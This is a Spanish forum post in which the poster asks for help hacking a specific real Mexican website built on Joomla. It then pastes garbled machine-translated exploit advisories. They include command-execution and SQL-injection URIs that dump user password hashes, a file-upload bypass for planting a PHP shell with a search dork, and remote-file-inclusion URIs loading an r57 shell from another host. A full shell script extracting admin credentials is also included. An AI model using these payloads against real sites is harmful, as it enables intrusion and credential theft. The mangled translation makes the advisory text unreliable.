Mira men, lo que posteaste esta super super chido, pero no entendi muy bien....!! si yo quiero crackear una pagina web programada en php y esta tiene un SMC de Joomla!!!
Afuerzas tengo que aprender a programar en PHP!!!!si la malloria de las vulnerabilidad
es hacen referencia a la ejecucion de codigos albitrarios
Me gustaria y te agradeceria si me puedes ayudar a saber como puedo crackear una pagina web!!
esta se llama www.Atlacomulc
o.com.mx
Aqui esta lo que encontre de vulnerabilidad
es!!!!
siCRACKEAR SMC DE JOOMLA
¡Joomla! Vulnerabilidad alejada componente de la ejecución del comando de la búsqueda
¡Joomla! es propensa una vulnerabilidad alejada de la comando-ejecución porque no puede esterilizar adecuadamente datos user-supplied. Los atacantes pueden explotar esta edición para ejecutar comandos arbitrarios con los privilegios del uso afectado. Los ataques acertados pueden facilitar un compromiso del uso y del web server subyacente; otros ataques son también posibles. ¡Joomla! 1.5 2 beta se divulga para ser vulnerables. Las versiones anteriores se pueden afectar también. Debe ser observado que la versión estable 1.0.13 no es afectada por esta edición.
Un atacante puede explotar esta edición vía un browser. La prueba siguiente de URI del concepto está disponible:
http://www.example.com/index.php?searchword=";phpinfo();%23&option=com_search&Itemid=1
http://www.example.com/index.php?c=id&searchword=";system($_GET[c]);%23&option=com_search&Itemid=1
Vulnerabilidad de la inyección del componente Index.PHP SQL de la galería del potro de Joomla
El componente de la galería del potro de Joomla es propenso una vulnerabilidad de la SQL-inyección porque no puede esterilizar suficientement
e datos user-supplied antes de usarla en una pregunta del SQL. Explotar esta edición podía permitir que un atacante comprometa el uso, tenga acceso o modifique a datos, o explote vulnerabilidad
es latentes en la puesta en práctica subyacente de la base de datos. La galería 1.5 del potro es vulnerable a esta edición; las versiones anteriores pueden también ser afectadas.
Los atacantes pueden utilizar un browser para explotar esta edición. El ejemplo siguiente URIs está disponible:
http://www.example.com/index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=[SQL inject]
http://www.example.com/index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=%20union%20select%201,2,3,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),5,0,0%20from%20jos_users/*[[/SQL]]
Vulnerabilidad arbitraria del Upload del archivo del componente Uploadimg.PHP de la exposición de Joomla
El componente de la exposición de Joomla es propenso una vulnerabilidad que deje a atacantes upload archivos arbitrarios. Esta edición ocurre porque el uso no puede esterilizar suficientement
e la entrada user-supplied. Explotar esta edición podía permitir que un atacante upload y ejecute código arbitrario de la escritura en el contexto del proceso afectado del web server. Esto puede ayudar al atacante a comprometer el uso; otros ataques son posibles. La exposición RC35 de Joomla y las versiones anteriores se divulgan vulnerable. CLASSIFIEDS EN LÍNEA
Los atacantes pueden explotar esta edición a través de un browser. La información de la hazaña está disponible:
================================================================================================================
++ Joomla Component Expose <= RC35 Remote Permission Bypass/Arbitrary File Upload Vulnerability ++
++ http://joomlacode.org/gf/download/frsrelease/726/10814/com_expose_small_rc4.zip ++
----------------------------------------------------------------------------------------------------------------
++ in : /com_expose/uploadimg.php ++
++ => $target_path = "../../../components/com_expose/expose/img/"; ++
++ if((strcasecmp(substr($userfile_name,-4),'.jpg'))){ echo "<script>alert('The file must be jpg');</script>";++
++ File Upload : <?php echo $target_path; ?> ++
++ Attacker Got Permission Bypass and upload files ++
----------------------------------------------------------------------------------------------------------------
++ Arbitrary File Upload ++
++ use this link to upload your phpshell [ phpshell.php.j
pg ] ++
++ http://site.com/administrator/components/com_expose/uploadimg.php ++
++ You wil have shell file in this page ++
++ http://site.com/components/com_expose/expose/img/ ++
++ Example : http://ayazshah.com/ ++
++ Dork : "index.php?option=com_expose" ++
----------------------------------------------------------------------------------------------------------------
++ Cold z3ro ++
++ http://hackteach.org ++
----------------------------------------------------------------------------------------------------------------
++ Greets : Hackteach Members , Xp10.Com ++
++ Greets 2 arab Coders : ValentinoLove,Gold M,Sniper-sa,dOCnOK,Hammam,Pal-booter Coders speciale Mr.jerusalem++
¡Joomla! Vulnerabilidad
es múltiples de Scripting del Cruz-Sitio del módulo de la administración
¡Joomla! es vulnerabilidad
es el scripting del cruz-sitio múltiple propenso porque el uso no puede esterilizar correctamente la entrada user-supplied antes de usarla en contenido dinámicamente generado. Un atacante puede leverage esta edición para hacer que el código arbitrario de la escritura se ejecute en el browser de un usuario unsuspecting en el contexto del sitio afectado. Esto puede ayudar al atacante a robar las credenciales galleta-basadas de la autentificación y a lanzar otros ataques. ¡Estas ediciones afectan Joomla! 1.0.12; otras versiones pueden también ser afectadas. Para explotar estas ediciones, el usuario de la blanco debe ser authenticado con privilegios del administrador. Los ataques acertados pueden hacer código malévolo ser inyectado persistente en secciones activas de un Web site vulnerable.
Para explotar estas ediciones un atacante debe tentar a un administrador authenticado del uso para seguir a un URI malévolo hecho a mano.
¡Joomla! Vulnerabilidad de Scripting del Cruz-Sitio del módulo Mod_Lettermans
ubscribe.PHP del suscriptor del ganador de una letra
¡El Joomla! El módulo del suscriptor del ganador de una letra es propenso una vulnerabilidad scripting del cruz-sitio porque el uso no puede esterilizar correctamente la entrada user-supplied. Un atacante puede leverage esta edición para ejecutar código arbitrario de la escritura en el browser de un usuario unsuspecting en el contexto del sitio afectado. Esto puede ayudar al atacante a robar las credenciales galleta-basadas de la autentificación y a lanzar otros ataques. ¡Joomla! El suscriptor 1.2.4-RC1 del ganador de una letra es vulnerable; otras versiones pueden también ser afectadas.
Un atacante puede explotar esta edición tentando a un usuario unsuspecting para seguir a un URI malévolo. Se ha proporcionado el código de la hazaña de la muestra:
http://www.example.com/index.php?option=com_letterman&task=view&id=1&Itemid=1">
JD Wiki para el archivo alejado múltiple de Joomla incluyen vulnerabilidad
es
JD-Wiki es telecontrol múltiple propenso archivo-incluye vulnerabilidad
es porque no puede esterilizar correctamente la entrada user-supplied. Un atacante puede explotar estas ediciones para incluir los archivos alejados arbitrarios que contienen código malévolo de PHP y para ejecutarlos en el contexto del proceso del web server. Esto puede permitir que el atacante comprometa el uso y acceda al sistema subyacente. JD-Wiki 1.0.2 y versiones anteriores son vulnerables a esta edición; otras versiones pueden también ser afectadas
Los atacantes pueden utilizar un browser para explotar estas ediciones. El prueba-de-concepto siguiente URIs está disponible:
http://www.example.com/components/com_jd-wiki/bin/dwpage.php?mosConfig_abso
lute_path=
http://www.example.com/components/com_jd-wiki/bin/wantedpages.php?mosConfig_abso
lute_path=
El archivo alejado del componente Comutils.PHP de Joomla JEvents incluye vulnerabilidad
El componente de Joomla JEvents es propenso un telecontrol archivo-incluye vulnerabilidad porque no puede esterilizar suficientement
e la entrada user-supplied. Un atacante puede explotar estas ediciones para ejecutar código malévolo de PHP en el contexto del proceso del web server. Esto puede permitir que el atacante comprometa el uso y el sistema subyacente; otros ataques son también posibles. Esta edición afecta JEvents 1.4.1; otras versiones pueden también ser afectadas.
Los atacantes pueden utilizar un browser para explotar esta edición. El URI siguiente del ejemplo está disponible:
http://www.example.com/component/com_events/includes/comutils.php?mosConfig_abso
lute_path=
Vulnerabilidad de la inyección del componente Index.PHP SQL de la Phil-UNO-Forma de Joomla
El componente de la Phil-UNO-Forma de Joomla es propenso una vulnerabilidad de la SQL-inyección porque no puede esterilizar suficientement
e datos user-supplied antes de usarla en una pregunta del SQL. Explotar esta edición podía permitir que un atacante comprometa el uso, tenga acceso o modifique a datos, o explote vulnerabilidad
es latentes en la puesta en práctica subyacente de la base de datos. La Phil-UNO-Forma 1.2.0.0 es vulnerable a esta edición.
Ejemplo:Archivo php
#!/bin/sh
#################################################################################
# #
# Joomla Component Phil-a-Form <= 1.2.0.0 SQL Injection Exploit #
# #
# Discovered by: Cody "CypherXero" Rester #
# Payload: Admin Username and MD5 Hash Retrieval #
# Website: http://www.cypherxero.net #
# Shoutouts to the milw0rm community, the PIMP forums #
# and my blog, of course #
# #
#################################################################################
echo "-------------------------------------------------------------------------"
echo " Joomla Component Phil-a-Form <= 1.2.0.0 SQL Injection Exploit"
echo "-------------------------------------------------------------------------"
echo "Usage: sql_philaform_
jos.sh [HOST] [FORM_ID]"
echo "[HOST] = Hostname of targetwebsite"
echo "[FORM_ID] = Form ID of Phil-a-Form post"
echo "e.g. sql_philaform_
jos.sh http://www.targethost.com 2"
echo "-------------------------------------------------------------------------"
echo " Cody CypherXero Rester"
echo " http://www.cypherxero.net"
echo "-------------------------------------------------------------------------"
jos_username="%20UNION%20SELECT%20null,null,username,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20jos_users%20--"
jos_password="%20UNION%20SELECT%20null,null,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20jos_users%20--"
host="$1"
form_id="$2"
if [ "$form_id" == "" ]
then
echo "Syntax not correct! See usage example!"
exit 1
else
echo ""
fi
echo "Username" > $host.txt
echo "--------" >> $host.txt
links -dump "http://$host/index.php?option=com_philaform&form_id=$form_id$jos_username" | grep -i "philaform_" | awk -F\_ '{ print $2 }' | awk '{ print $1 }' >> $host.txt
echo " " >> $host.txt
echo "MD5 Password Hash" >> $host.txt
echo "-----------------" >> $host.txt
links -dump "http://$host/index.php?option=com_philaform&form_id=$form_id$jos_password" | grep -i "philaform_" | awk -F\_ '{ print $2 }' | awk '{ print $1 }' >> $host.txt
echo ""
cat $host.txt
exit 0
# milw0rm.com [2007-05-28]
El archivo alejado de PHPConcept PCLTar PCLTar.PHP incluye vulnerabilidad
PclTar es propenso un telecontrol archivo-incluye vulnerabilidad porque no puede esterilizar suficientement
e la entrada user-supplied. Explotar esta edición puede permitir que un atacante comprometa los usos que utilizan la biblioteca afectada así como el sistema subyacente; otros ataques son también posibles. NOTA: ¡Esta vulnerabilidad fue pensada originalmente para afectar Joomla! directamente. El análisis adicional ha revelado que la edición afecta la biblioteca de PclTar. Este expediente se ha puesto al día por consiguiente.
Los atacantes pueden utilizar un browser para explotar esta edición. El URI siguiente del prueba-de-concepto está disponible:
http://www.example.com/lib/pcltar.php?g_pcltar_lib_d
ir=[shell]
El archivo alejado del módulo Index.PHP de la plantilla de Joomla incluye vulnerabilidad
El módulo de la plantilla de Joomla es propenso un telecontrol archivo-incluye vulnerabilidad porque no puede esterilizar suficientement
e la entrada user-supplied. Un atacante puede explotar estas ediciones para ejecutar código malévolo de PHP en el contexto del proceso del web server. Esto puede permitir que el atacante comprometa el uso y el sistema subyacente; otros ataques son también posibles. Esta edición afecta la plantilla Be2004-2; otras versiones pueden también ser afectadas
Los atacantes pueden utilizar un browser para explotar esta edición. El código siguiente de la hazaña está disponible.
/data/vulnerabilities/exploits/23549.pl
Joomla/el archivo alejado de MosConfig_Abso
lute_Path del módulo de JoomlaPack del mambo incluye vulnerabilidad
JoomlaPack es propenso un telecontrol archivo-incluye vulnerabilidad porque no puede esterilizar suficientement
e la entrada user-supplied. Explotar esta edición puede permitir que un atacante comprometa el uso y el sistema subyacente; otros ataques son también posibles. Esta edición afecta JoomlaPack 1.0.4a2 RE; otras versiones pueden también ser vulnerables
Los atacantes pueden utilizar un browser para explotar esta edición. El URI siguiente del prueba-de-concepto está disponible:
http://www.example.com/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_abso
lute_path=http://www.example2.com/r57.txt?
Vulnerabilidad componente de la inyección de Joomla RWCards SQL
El componente de Joomla RWCards es propenso una vulnerabilidad de la SQL-inyección porque no puede esterilizar suficientement
e datos user-supplied antes de usarla en una pregunta del SQL. Explotar esta edición podía permitir que un atacante comprometa el uso, tenga acceso o modifique a datos, o explote vulnerabilidad
es latentes en la puesta en práctica subyacente de la base de datos. RWCards 2.4.3 y las versiones anteriores son vulnerables a esta edición
Los atacantes pueden utilizar un browser para explotar esta edición. La hazaña siguiente del ejemplo está disponible:
http://www.securityfocus.com/data/vulnerabilities/exploits/Joomla_RWCards_sql_rexp.pl
El archivo alejado del mosConfig_Abso
lute_Path del libro de dirección de NFN incluye vulnerabilidad
El componente del libro de dirección de NFN para el mambo y Joomla es propenso un telecontrol archivo-incluye vulnerabilidad porque no puede esterilizar correctamente la entrada user-supplied. Un atacante puede explotar esta edición para incluir un archivo alejado arbitrario que contiene código malévolo de PHP y para ejecutarlo en el contexto del proceso del web server. Esto puede facilitar un compromiso del uso y de los sistemas subyacentes; otros ataques son también posibles.
http://www.example.com/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_abso
lute_path=http://www,example.com/Evil-script?
Autor